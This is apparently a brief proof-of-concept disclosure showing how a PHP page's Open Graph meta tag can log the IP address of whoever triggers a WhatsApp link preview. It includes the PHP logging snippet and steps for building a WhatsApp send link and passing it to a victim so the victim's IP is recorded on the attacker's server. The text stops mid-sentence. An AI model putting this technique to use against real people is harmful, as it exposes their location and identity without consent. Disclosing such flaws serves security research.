Simple php code could disclose Whatsapp ip address and app version and save disclosed information to attackers server.
Step to reproduce:
- Create php file and log file on server : Put below code for og meta description :
<meta property="og:description" content="<?php echo $_SERVER[REMOTE_ADDR]; $line = date(’Y-m-d H:i:s’) . " - $_SERVER[REMOTE_ADDR] ";echo $line; file_put_contents(’visitors.log’, $line . PHP_EOL, FILE_APPEND);?>" />
- 2. Save this php file.
- 3. Open whatsapp and type this php files url in whatsapp, when link preview generated you can see IP get captured and same time this IP write over log file on attackers server.
easy way to get ip with this method
https://api.whatsapp.com/send?phone=&text=
phone= any valid number
text= will be encoded url of php file
just send whole constructed url to victim
once victim click over this url, private message open with link preview.
Some Community Users created github repository for this: